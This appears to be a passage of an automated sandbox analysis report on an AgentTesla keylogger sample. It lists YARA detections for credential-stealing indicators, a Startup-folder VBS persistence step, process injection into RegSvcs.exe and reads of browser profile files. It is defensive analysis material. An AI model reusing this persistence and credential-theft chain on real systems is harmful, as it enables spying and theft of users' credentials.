Source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: This is a third-party compiled AutoIt script. 0_2_00DD3B4C
Source: toIuQILmr1.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: toIuQILmr1.exe, 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_7805aec2-7
Source: toIuQILmr1.exe, 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_08328b0b-4
Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: This is a third-party compiled AutoIt script. 2_2_00C53B4C
Source: outvaunts.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: outvaunts.exe, 00000002.00000002.2067226635.0000000000D05000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_76b6640e-9
                    Source: outvaunts.exe, 00000002.00000002.2067226635.0000000000D05000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_890e5113-f
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: This is a third-party compiled AutoIt script.5_2_00C53B4C
                    Source: outvaunts.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: outvaunts.exe, 00000005.00000002.2185271062.0000000000D05000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_15f333e8-e
                    Source: outvaunts.exe, 00000005.00000002.2185271062.0000000000D05000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_918e871a-7
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DD3633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00DD3633
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5C27C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_00E5C27C
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5C220 NtdllDialogWndProc_W,0_2_00E5C220
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5C49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_00E5C49C
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5C788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_00E5C788
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5C8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_00E5C8EE
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5C86D SendMessageW,NtdllDialogWndProc_W,0_2_00E5C86D
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5CBF9 NtdllDialogWndProc_W,0_2_00E5CBF9
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5CBAE NtdllDialogWndProc_W,0_2_00E5CBAE
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5CB7F NtdllDialogWndProc_W,0_2_00E5CB7F
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5CB50 NtdllDialogWndProc_W,0_2_00E5CB50
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5CC2E ClientToScreen,NtdllDialogWndProc_W,0_2_00E5CC2E
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00E5CDAC
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5CD6C GetWindowLongW,NtdllDialogWndProc_W,0_2_00E5CD6C
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DD1290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_00DD1290
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DD1287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,745AC8D0,NtdllDialogWndProc_W,0_2_00DD1287
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DD16DE GetParent,NtdllDialogWndProc_W,0_2_00DD16DE
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5D6C6 NtdllDialogWndProc_W,0_2_00E5D6C6
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DD16B5 NtdllDialogWndProc_W,0_2_00DD16B5
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DD167D NtdllDialogWndProc_W,0_2_00DD167D
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5D74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,0_2_00E5D74C
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DD189B NtdllDialogWndProc_W,0_2_00DD189B
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5DA9A NtdllDialogWndProc_W,0_2_00E5DA9A
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5BF4D NtdllDialogWndProc_W,CallWindowProcW,0_2_00E5BF4D
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C53633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,2_2_00C53633
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDC27C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,2_2_00CDC27C
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDC220 NtdllDialogWndProc_W,2_2_00CDC220
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDC49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,2_2_00CDC49C
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDC788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,2_2_00CDC788
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDC8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,2_2_00CDC8EE
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDC86D SendMessageW,NtdllDialogWndProc_W,2_2_00CDC86D
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDCBF9 NtdllDialogWndProc_W,2_2_00CDCBF9
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDCBAE NtdllDialogWndProc_W,2_2_00CDCBAE
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDCB50 NtdllDialogWndProc_W,2_2_00CDCB50
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDCB7F NtdllDialogWndProc_W,2_2_00CDCB7F
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDCC2E ClientToScreen,NtdllDialogWndProc_W,2_2_00CDCC2E
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDCDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00CDCDAC
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDCD6C GetWindowLongW,NtdllDialogWndProc_W,2_2_00CDCD6C
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C51287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,745AC8D0,NtdllDialogWndProc_W,2_2_00C51287
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C51290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,2_2_00C51290
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDD6C6 NtdllDialogWndProc_W,2_2_00CDD6C6
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C516DE GetParent,NtdllDialogWndProc_W,2_2_00C516DE
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C516B5 NtdllDialogWndProc_W,2_2_00C516B5
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C5167D NtdllDialogWndProc_W,2_2_00C5167D
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDD74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,2_2_00CDD74C
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C5189B NtdllDialogWndProc_W,2_2_00C5189B
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDDA9A NtdllDialogWndProc_W,2_2_00CDDA9A
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDBF4D NtdllDialogWndProc_W,CallWindowProcW,2_2_00CDBF4D
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C53633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,5_2_00C53633
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDC27C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,5_2_00CDC27C
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDC220 NtdllDialogWndProc_W,5_2_00CDC220
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDC49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,5_2_00CDC49C
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDC788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,5_2_00CDC788
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDC8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,5_2_00CDC8EE
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDC86D SendMessageW,NtdllDialogWndProc_W,5_2_00CDC86D
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDCBF9 NtdllDialogWndProc_W,5_2_00CDCBF9
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDCBAE NtdllDialogWndProc_W,5_2_00CDCBAE
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDCB50 NtdllDialogWndProc_W,5_2_00CDCB50
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDCB7F NtdllDialogWndProc_W,5_2_00CDCB7F
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDCC2E ClientToScreen,NtdllDialogWndProc_W,5_2_00CDCC2E
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDCDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_00CDCDAC
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDCD6C GetWindowLongW,NtdllDialogWndProc_W,5_2_00CDCD6C
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C51287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,745AC8D0,NtdllDialogWndProc_W,5_2_00C51287
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C51290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,5_2_00C51290
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDD6C6 NtdllDialogWndProc_W,5_2_00CDD6C6
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C516DE GetParent,NtdllDialogWndProc_W,5_2_00C516DE
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C516B5 NtdllDialogWndProc_W,5_2_00C516B5
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C5167D NtdllDialogWndProc_W,5_2_00C5167D
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDD74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,5_2_00CDD74C
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C5189B NtdllDialogWndProc_W,5_2_00C5189B
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDDA9A NtdllDialogWndProc_W,5_2_00CDDA9A
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDBF4D NtdllDialogWndProc_W,CallWindowProcW,5_2_00CDBF4D
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E340B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00E340B1
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E28858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74AE5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_00E28858
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E3545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00E3545F
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CB545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_00CB545F
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CB545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,5_2_00CB545F
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Code function: String function: 00DD7F41 appears 35 times
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Code function: String function: 00DF0D27 appears 70 times
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Code function: String function: 00DF8B40 appears 42 times
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Code function: String function: 00C55A64 appears 50 times
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Code function: String function: 00C59A20 appears 42 times
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Code function: String function: 00C81B90 appears 58 times
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Code function: String function: 00C57F41 appears 70 times
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Code function: String function: 00C7313D appears 42 times
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Code function: String function: 00C70D27 appears 140 times
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Code function: String function: 00C78B40 appears 84 times
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Code function: String function: 00C73A0B appears 38 times
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Code function: String function: 00C51D35 appears 38 times
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Code function: String function: 00C79FB5 appears 46 times
                    Source: toIuQILmr1.exe Static PE information: Resource name: RT_STRING type: COM executable for DOS
                    Source: outvaunts.exe.0.dr Static PE information: Resource name: RT_STRING type: COM executable for DOS
                    Source: toIuQILmr1.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 2.2.outvaunts.exe.1b30000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.outvaunts.exe.1b30000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 5.2.outvaunts.exe.3e90000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.outvaunts.exe.3e90000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 2.2.outvaunts.exe.1b30000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.outvaunts.exe.1b30000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 5.2.outvaunts.exe.3e90000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.outvaunts.exe.3e90000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@10/6@2/2
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Code function: 0_2_00E3A2D5 GetLastError,FormatMessageW
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Code function: 0_2_00E28713 AdjustTokenPrivileges,CloseHandle
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Code function: 0_2_00E28CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Code function: 2_2_00CA8713 AdjustTokenPrivileges,CloseHandle
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Code function: 2_2_00CA8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Code function: 5_2_00CA8713 AdjustTokenPrivileges,CloseHandle
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Code function: 5_2_00CA8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Code function: 0_2_00E3B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Code function: 0_2_00E4F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Code function: 0_2_00E486D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Code function: 0_2_00DD4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe File created: C:\Users\user\AppData\Local\kinematical
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: NULL
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe File created: C:\Users\user\AppData\Local\Temp\autFF64.tmp
                    Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: toIuQILmr1.exe Virustotal: Detection: 76%
                    Source: toIuQILmr1.exe ReversingLabs: Detection: 71%
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe File read: C:\Users\user\Desktop\toIuQILmr1.exe
                    Source: unknown Process created: C:\Users\user\Desktop\toIuQILmr1.exe "C:\Users\user\Desktop\toIuQILmr1.exe"
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Process created: C:\Users\user\AppData\Local\kinematical\outvaunts.exe "C:\Users\user\Desktop\toIuQILmr1.exe"
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\toIuQILmr1.exe"
                    Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs"
                    Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\kinematical\outvaunts.exe "C:\Users\user\AppData\Local\kinematical\outvaunts.exe"
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\kinematical\outvaunts.exe"
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Section loaded: mpr.dll
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Section loaded: version.dll
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Section loaded: wininet.dll
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Section loaded: winmm.dll
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Section loaded: wsock32.dll
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe Section loaded: windows.storage.dll
